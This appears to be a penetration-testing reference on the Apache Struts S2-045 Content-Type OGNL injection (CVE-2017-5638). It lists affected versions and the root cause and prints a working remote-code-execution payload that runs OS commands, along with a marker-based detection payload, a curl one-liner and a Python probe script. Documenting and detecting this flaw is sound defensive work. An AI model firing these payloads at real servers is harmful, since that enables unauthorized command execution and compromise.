S2-045 Remote Code Execution (CVE-2017-5638)
Affected Versions
Vulnerable Struts versions include:
- 2.3.5 – 2.3.31
- 2.5 – 2.5.10
Root Cause
- Struts evaluates OGNL expressions embedded in the Content-Type request header
- Triggered when the Jakarta multipart parser fails to parse the request: the malformed header value is copied into the error message, and that message is then run through OGNL evaluation
- The sandbox restrictions (SecurityMemberAccess, excluded classes and packages) are disabled from inside the expression, allowing:
  - Arbitrary Java method execution
  - OS command execution
The vulnerable code is in file upload (multipart) handling, but the application does not need to expose any upload feature: Struts wraps every request whose Content-Type header contains the string multipart/form-data, on any Struts-handled URL, before the action itself runs.
Testing Payloads
Core Exploit Payload (RCE)
%{(#n='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
- Executes the OS command set in #cmd (here id), choosing cmd.exe /c on Windows and /bin/bash -c elsewhere
- Writes the command output (stdout and stderr, via redirectErrorStream) into the HTTP response body
Detection Payload (Safe Testing)
Instead of executing commands, print a marker:
%{(#n='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getWriter())).(#ros.print('\ntest\n\n'))}
Detection Using Curl
detect.sh
# Content-Type carries the detection payload from above; TARGET is the Struts host. -i keeps the status line so the marker is easy to spot.
PAYLOAD="%{(#n='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getWriter())).(#ros.print('\ntest\n\n'))}"
curl -s -i --header "Content-Type: ${PAYLOAD}" http://TARGET/
Vulnerable Response
test
- The marker appears in the response body, which confirms the server evaluated the OGNL expression
- No command execution was required to prove it
- Because the marker is written straight to the servlet response, it can show up on its own, in front of the normal page, or inside an error page; check the body regardless of status code
- A normal page can also contain the word test, so use a unique random marker when scanning more than one host
- With the RCE payload instead, the output of the OS command is returned in the HTTP response body
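The same detection flow (send the marker-printing payload in Content-Type, look for the marker in the response body) as an added example script; this is not the page's detect.sh or any project code. It generates a random marker instead of the fixed string test, so a page that legitimately contains that word is not reported as vulnerable, and it inspects the body of 4xx/5xx responses too, since the marker is written directly to the servlet response. The target URL placeholder, the 10-second timeout and the s2045- marker prefix are assumptions.

```python
#!/usr/bin/env python3
"""Added example: S2-045 (CVE-2017-5638) detection probe.

Sends the marker-printing detection payload in the Content-Type header and
reports the target as vulnerable only if that marker comes back in the body.
Hypothetical script, not the page's detect.sh; URL and timeout are assumptions.
"""
import secrets
import sys
import urllib.error
import urllib.request

# Shared prefix of the exploit and detection payloads on this page. The literal
# 'multipart/form-data' makes Struts hand the request to the Jakarta multipart
# parser; the rest swaps in DEFAULT_MEMBER_ACCESS and clears OgnlUtil's excluded
# classes/packages so the remainder of the expression is allowed to run.
OGNL_PREFIX = (
    "%{(#n='multipart/form-data')."
    "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    "(#_memberAccess?(#_memberAccess=#dm):("
    "(#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    "(#ognlUtil.getExcludedPackageNames().clear())."
    "(#ognlUtil.getExcludedClasses().clear())."
    "(#context.setMemberAccess(#dm))))."
)


def new_marker() -> str:
    """Random marker: a page that happens to contain the word 'test' must not count as a hit."""
    return "s2045-" + secrets.token_hex(8)  # 's2045-' prefix is an assumption


def build_detection_payload(marker: str) -> str:
    """Detection payload: print the marker to the response instead of running a command."""
    if "'" in marker or "\\" in marker:
        raise ValueError("marker must not contain OGNL string delimiters")
    return (
        OGNL_PREFIX
        + "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getWriter()))."
        + "(#ros.print('" + marker + "'))}"
    )


def response_indicates_vulnerable(body: str, marker: str) -> bool:
    """True only if the server wrote our marker, i.e. it evaluated the OGNL."""
    return marker in body


def probe(url: str, timeout: float = 10.0):
    """Send one probe to url; returns (vulnerable, marker, http_status).

    The marker is written straight to the servlet response, so what comes back
    may be a normal 200, an error page, or a 4xx/5xx whose body still contains
    the marker; the body is inspected in every case.
    """
    marker = new_marker()
    req = urllib.request.Request(
        url,
        headers={"Content-Type": build_detection_payload(marker)},
        method="GET",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status, body = resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:
        status, body = exc.code, exc.read().decode("utf-8", "replace")
    return response_indicates_vulnerable(body, marker), marker, status


if __name__ == "__main__":
    # Placeholder target; pass the real URL as the first argument.
    target = sys.argv[1] if len(sys.argv) > 1 else "http://TARGET/"
    vulnerable, marker, status = probe(target)
    verdict = "FOUND -> vulnerable" if vulnerable else "absent"
    print(f"{target}: HTTP {status}, marker {marker} {verdict}")
```

Run it as `python3 s2045_probe.py http://host/some/action` against a host you are authorized to test. A hit is a body containing the random marker, whatever the status code; an absent marker on a 200 means only that this URL did not evaluate the header, not that the host is patched.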